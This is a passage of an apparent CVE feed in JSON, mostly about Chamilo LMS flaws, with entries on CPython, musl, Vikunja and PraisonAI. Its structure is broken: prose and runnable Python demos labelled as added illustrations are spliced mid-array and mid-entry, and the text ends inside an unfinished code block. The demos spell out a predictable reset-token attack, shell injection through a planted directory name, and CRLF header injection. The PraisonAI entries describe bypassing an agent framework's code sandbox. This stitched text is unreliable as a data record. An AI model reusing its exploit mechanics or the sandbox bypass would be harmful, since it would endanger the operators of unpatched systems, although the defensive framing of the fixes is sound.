While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00215,"ranking_epss":0.43996,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33705","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12648,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33706","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. 
This vulnerability is fixed in 1.11.38.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33707","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":9.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.4,"cvss_v4":null,"epss":0.00065,"ranking_epss":0.20204,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8","https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33618","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. 
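The CVE-2026-33707 entry above describes a reset token that is a pure function of the e-mail address. The following is an added Python illustration, not Chamilo's code: `predictable_token` models the sha1($email) scheme so the attacker's computation is visible, and `issue_reset_token` / `verify_reset_token` (names chosen for this example, backed by an in-memory `_pending` store that a real deployment would keep in the database) show the three properties the advisory says are missing: a random component, an expiry, and a limit on verification attempts.

```python
"""Predictable versus unpredictable password-reset tokens.

Added illustration for CVE-2026-33707 (Chamilo LMS reset token = sha1($email)).
This is not Chamilo's code: it is a stand-alone Python model of the described
flaw next to a corrected design. issue_reset_token, verify_reset_token and
the in-memory _pending store are names chosen for this example.
"""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional


def predictable_token(email: str) -> str:
    """The flawed scheme: the token depends only on the e-mail address, so
    anyone who knows the address can recompute it, and it never expires."""
    return hashlib.sha1(email.encode("utf-8")).hexdigest()


TOKEN_TTL_SECONDS = 15 * 60      # short lifetime
MAX_ATTEMPTS_PER_EMAIL = 5       # crude rate limit on verification attempts

# Per-email pending reset. Only the token's hash is stored, so a database
# read does not yield usable tokens. (In-memory here; the DB in real life.)
_pending: Dict[str, dict] = {}


def issue_reset_token(email: str, now: Optional[float] = None) -> str:
    """Mint a random token, store its hash with an expiry, and return the raw
    token (the value that would be e-mailed to the user)."""
    now = time.time() if now is None else now
    raw = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
    _pending[email] = {
        "digest": hashlib.sha256(raw.encode("utf-8")).hexdigest(),
        "expires": now + TOKEN_TTL_SECONDS,
        "attempts": 0,
    }
    return raw


def verify_reset_token(email: str, presented: str,
                       now: Optional[float] = None) -> bool:
    """Single-use, expiring, attempt-limited, constant-time comparison."""
    now = time.time() if now is None else now
    rec = _pending.get(email)
    if rec is None:
        return False
    rec["attempts"] += 1
    if rec["attempts"] > MAX_ATTEMPTS_PER_EMAIL or now > rec["expires"]:
        _pending.pop(email, None)            # burn the token on abuse or expiry
        return False
    got = hashlib.sha256(presented.encode("utf-8")).hexdigest()
    if not hmac.compare_digest(rec["digest"], got):
        return False
    _pending.pop(email, None)                # single use
    return True
```

Hashing the stored token (and comparing with `hmac.compare_digest`) matters because a reset-token table is exactly what an SQL injection or backup leak exposes; storing the raw token would turn such a read into account takeover for every pending reset.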
This vulnerability is fixed in 2.0.0-RC.3.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00047,"ranking_epss":0.14458,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w"],"published_time":"2026-04-10T19:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27460","summary":"Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.5, a critical Denial of Service (DoS) vulnerability exists in the recipe import functionality. It allows an authenticated user to crash the server or significantly degrade its performance by uploading a ZIP bomb (a small archive that decompresses to a very large size). This vulnerability is fixed in 2.6.5.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11798,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-w8pq-4pwf-r2m8","https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-w8pq-4pwf-r2m8"],"published_time":"2026-04-10T19:16:21","vendor":"tandoor","product":"recipes","version":null},{"cve_id":"CVE-2026-40162","summary":"Bugsink is a self-hosted error tracking tool. Version 2.1.0 contains an authenticated file write vulnerability in the artifact bundle assembly flow. A user with a valid authentication token could cause the application to write attacker-controlled content to a filesystem location writable by the Bugsink process. 
This vulnerability is fixed in 2.1.1.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00084,"ranking_epss":0.2439,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/bugsink/bugsink/releases/tag/2.1.1","https://github.com/bugsink/bugsink/security/advisories/GHSA-8hw4-fhww-273g"],"published_time":"2026-04-10T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40163","summary":"Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.json file with attacker-controlled JSON content anywhere on the server filesystem. The GET /sync/upload_finished endpoint allows an unauthenticated attacker to list arbitrary directory contents and read specific JSON files. This vulnerability is fixed in 1.4.5, 1.5.5, and 1.6.0-beta.4.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.00078,"ranking_epss":0.23162,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saltcorn/saltcorn/security/advisories/GHSA-32pv-mpqg-h292"],"published_time":"2026-04-10T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5483","summary":"A flaw was found in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) that allows disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. 
This could enable an attacker to gain unauthorized access to Kubernetes resources.","cvss":8.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.5,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.19689,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://access.redhat.com/errata/RHSA-2026:7397","https://access.redhat.com/errata/RHSA-2026:7398","https://access.redhat.com/errata/RHSA-2026:7403","https://access.redhat.com/errata/RHSA-2026:7404","https://access.redhat.com/security/cve/CVE-2026-5483","https://bugzilla.redhat.com/show_bug.cgi?id=2454764"],"published_time":"2026-04-10T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32894","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook result view page allows any authenticated teacher to delete any student's grade result across the entire platform by manipulating the delete_mark or resultdelete GET parameters. No ownership or course-scope verification is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08074,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151","https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32930","summary":"Chamilo LMS is a learning management system. 
Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06812,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd","https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32931","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as the web server user (www-data). 
This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00158,"ranking_epss":0.36599,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4","https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32932","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Open Redirect vulnerability in the session course edit page allows an attacker to redirect an authenticated administrator to an arbitrary external URL after saving coach assignment changes. The redirect also leaks the id_session parameter to the attacker's server. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":4.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.7,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07812,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0","https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33141","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the REST API stats endpoint allows any authenticated user (including low-privilege students with ROLE_USER) to read any other user's learning progress, certificates, and gradebook scores for any course, without enrollment or supervisory relationship. 
This vulnerability is fixed in 2.0.0-RC.3.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03844,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31939","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into a filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38.","cvss":8.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.3,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12334,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78","https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31940","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. 
This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10494,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9","https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31941","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal or external resource. This allows an authenticated attacker to force the server to make arbitrary HTTP requests to internal services, scan internal ports, and access cloud instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07386,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265","https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32892","summary":"Chamilo LMS is a learning management system. 
Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter — which only passes through Security::remove_XSS() (an HTML-only filter) — is concatenated directly into shell commands such as exec(\"mv $source $target\"). By default, Chamilo allows all authenticated users to create courses (allow_users_to_create_courses = true). Any user who is a teacher in a course (including self-created courses) can move documents, making this vulnerability exploitable by any authenticated user. The attacker must first place a directory with shell metacharacters in its name on the filesystem (achievable via Course Backup Import), then move a document into that directory to trigger arbitrary command execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00194,"ranking_epss":0.41378,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf","https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32893","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in the exercise question list admin panel allows an attacker to execute arbitrary JavaScript in an authenticated teacher's browser. 
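The CVE-2026-32892 entry above hinges on a path with shell metacharacters reaching a command built by string concatenation. The following is an added Python illustration of that pattern, not Chamilo's PHP: `run_move_vulnerable` hands a concatenated `mv` string to `/bin/sh` the way `exec("mv $source $target")` does, while `run_move_safe` passes the same paths as separate argv entries (the equivalent of wrapping each with `escapeshellarg()`, or of avoiding the shell entirely with `rename()`). The directory name `uploads; echo INJECTED` stands in for the one the advisory says an attacker plants via Course Backup Import; it only echoes a marker here. `demo` assumes a POSIX `sh` and `mv` are available.

```python
"""Shell metacharacters in a path reaching a shell-built command.

Added illustration for CVE-2026-32892 (Chamilo fileManage.lib.php builds
exec("mv $source $target") from user-controlled paths without
escapeshellarg()). This is not Chamilo's code: it is a Python model of the
same pattern, run against a scratch directory. EVIL_DIRNAME is a constructed
attacker-controlled directory name; run_move_vulnerable and run_move_safe
are names chosen for the example. Requires a POSIX sh and mv.
"""
import os
import shlex
import subprocess
import tempfile

# A directory name the attacker controls. A real payload would fetch and run
# a reverse shell; this one only prints a marker so the effect is observable.
EVIL_DIRNAME = "uploads; echo INJECTED"


def run_move_vulnerable(source: str, target: str) -> str:
    """Concatenate, then let the shell parse: the same thing PHP's
    exec("mv $source $target") does. Returns the shell's stdout."""
    cmd = f"mv {source} {target}"
    proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout


def run_move_safe(source: str, target: str) -> str:
    """Pass paths as discrete argv entries so no shell ever sees them.
    PHP equivalent: exec('mv ' . escapeshellarg($source) . ' ' .
    escapeshellarg($target)), or better, rename() with no shell at all."""
    proc = subprocess.run(["mv", "--", source, target],
                          capture_output=True, text=True)
    return proc.stdout


def demo() -> dict:
    """Run both variants in a scratch directory and report what happened."""
    root = tempfile.mkdtemp(prefix="mvdemo")
    evil_dir = os.path.join(root, EVIL_DIRNAME)
    os.mkdir(evil_dir)

    # 1. Vulnerable: the shell sees `mv <src> <root>/uploads; echo INJECTED`,
    #    moves the file to a file literally named "uploads", then runs echo.
    src1 = os.path.join(root, "doc1.txt")
    open(src1, "w").close()
    out_vuln = run_move_vulnerable(src1, evil_dir)

    # 2. Safe: mv receives the whole directory name as one argument and
    #    moves the document into it; nothing else executes.
    src2 = os.path.join(root, "doc2.txt")
    open(src2, "w").close()
    out_safe = run_move_safe(src2, evil_dir)

    return {
        "vulnerable_output": out_vuln.strip(),
        "vulnerable_file_in_evil_dir": os.path.exists(os.path.join(evil_dir, "doc1.txt")),
        "safe_output": out_safe.strip(),
        "safe_file_in_evil_dir": os.path.exists(os.path.join(evil_dir, "doc2.txt")),
        "quoted_form": shlex.quote(evil_dir),   # what escapeshellarg() would emit
    }
```

The `--` in the safe variant also stops a file named `-rf` or `--backup=...` from being parsed as an option, which is the second class of bug that survives quoting alone.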
The pagination code merges all $_GET parameters via array_merge() and outputs the result via http_build_query() directly into HTML href attributes without htmlspecialchars() encoding. This vulnerability is fixed in 2.0.0-RC.3.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-66447","summary":"Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of the redirect parameter to /login. This vulnerability is fixed in 2.0-beta.2.","cvss":0.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":0.0,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08323,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv"],"published_time":"2026-04-10T18:16:40","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1502","summary":"CR/LF bytes were not rejected by HTTP client proxy tunnel headers or 
host.","cvss":5.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.7,"epss":0.00042,"ranking_epss":0.12467,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69","https://github.com/python/cpython/issues/146211","https://github.com/python/cpython/pull/146212","https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/","http://www.openwall.com/lists/oss-security/2026/04/11/4"],"published_time":"2026-04-10T18:16:40","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40200","summary":"An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02481,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://musl.libc.org/releases.html","https://www.openwall.com/lists/oss-security/2026/04/10/13","http://www.openwall.com/lists/oss-security/2026/04/10/13"],"published_time":"2026-04-10T17:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40103","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, Vikunja's scoped API token enforcement for custom project background routes is method-confused. A token with only projects.background can successfully delete a project background, while a token with only projects.background_delete is rejected. This is a scoped-token authorization bypass. 
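The CVE-2026-1502 entry above is a one-liner, so it helps to see what a CR/LF in a tunnel parameter actually does on the wire. The following is an added Python illustration, not CPython's code: `build_connect` assembles the CONNECT preamble the way an HTTP client does for a proxy tunnel, `header_lines` shows how the proxy would split it, and `validated_connect` adds the rejection that the advisory says was missing. The proxy, host and header values are constructed for the example.

```python
"""What a CR/LF in a proxy-tunnel parameter does to the CONNECT request.

Added illustration for CVE-2026-1502 (CPython's http.client did not reject
CR/LF bytes in proxy tunnel headers or the tunnel host). This is not
CPython's code: it assembles a CONNECT preamble the way a client does, shows
how an unchecked host splits into extra header lines, and adds the check that
refuses such input. EVIL_HOST and the header values are constructed.
"""
import re
from typing import Dict, List

_CRLF = re.compile(r"[\r\n]")


def build_connect(host: str, port: int, headers: Dict[str, str]) -> bytes:
    """Unchecked assembly: whatever is in host or headers is written
    verbatim into CRLF-delimited lines."""
    lines = [f"CONNECT {host}:{port} HTTP/1.1", f"Host: {host}:{port}"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def header_lines(raw: bytes) -> List[str]:
    """Header field lines as the proxy would parse them (request line excluded)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return head.split("\r\n")[1:]


def validated_connect(host: str, port: int, headers: Dict[str, str]) -> bytes:
    """Refuse any tunnel parameter containing CR or LF before assembly."""
    for value in (host, *headers.keys(), *headers.values()):
        if _CRLF.search(value):
            raise ValueError(f"CR/LF in tunnel parameter: {value!r}")
    return build_connect(host, port, headers)


# Constructed attacker-influenced host: a caller that derives the tunnel
# target from untrusted input ends up sending an extra header to the proxy.
EVIL_HOST = "target.example\r\nProxy-Authorization: Basic YWRtaW46aHVudGVyMg=="


def demo() -> dict:
    raw = build_connect(EVIL_HOST, 443, {"User-Agent": "demo/1.0"})
    try:
        validated_connect(EVIL_HOST, 443, {"User-Agent": "demo/1.0"})
        rejected = False
    except ValueError:
        rejected = True
    clean = validated_connect("target.example", 443, {})
    return {
        "lines": header_lines(raw),
        "rejected": rejected,
        "clean_ok": clean.startswith(b"CONNECT target.example:443 HTTP/1.1\r\n"),
    }
```

The injected line lands twice (once from the request line, once from the `Host:` line), which is why the check has to run on the raw parameter before assembly rather than on any single output line.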
This vulnerability is fixed in 2.3.0.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/6a0f39b252a81fa4b19dc56dc889183acc9225ae","https://github.com/go-vikunja/vikunja/pull/2584","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-v479-vf79-mg83"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40156","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI automatically loads a file named tools.py from the current working directory to discover and register custom agent tools. This loading process uses importlib.util.spec_from_file_location and immediately executes module-level code via spec.loader.exec_module() without explicit user consent, validation, or sandboxing. The tools.py file is loaded implicitly, even when it is not referenced in configuration files or explicitly requested by the user. As a result, merely placing a file named tools.py in the working directory is sufficient to trigger code execution. This behavior violates the expected security boundary between user-controlled project files (e.g., YAML configurations) and executable code, as untrusted content in the working directory is treated as trusted and executed automatically. If an attacker can place a malicious tools.py file into a directory where a user or automated system (e.g., CI/CD pipeline) runs praisonai, arbitrary code execution occurs immediately upon startup, before any agent logic begins.  
This vulnerability is fixed in 4.5.128.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06212,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40157","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128.","cvss":9.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.4,"epss":0.00072,"ranking_epss":0.21931,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40158","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct function in praisonaiagents/tools/python_tools.py uses AST filtering to block dangerous Python attributes like __subclasses__, __globals__, and __bases__. However, the filter only checks ast.Attribute nodes, allowing a bypass. 
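The CVE-2026-40157 entry above is the classic archive-traversal bug: member names are trusted and `../../` walks out of the output directory. The following is an added Python illustration, not PraisonAI's code: `build_bundle` constructs a tar in memory so the example runs offline, `check_members` resolves every member (and link target) against the destination, and `safe_extract` refuses the whole bundle if anything escapes, layering `tarfile`'s own `data` filter on top where the interpreter provides it.

```python
"""Refusing path-traversal members before extracting an archive.

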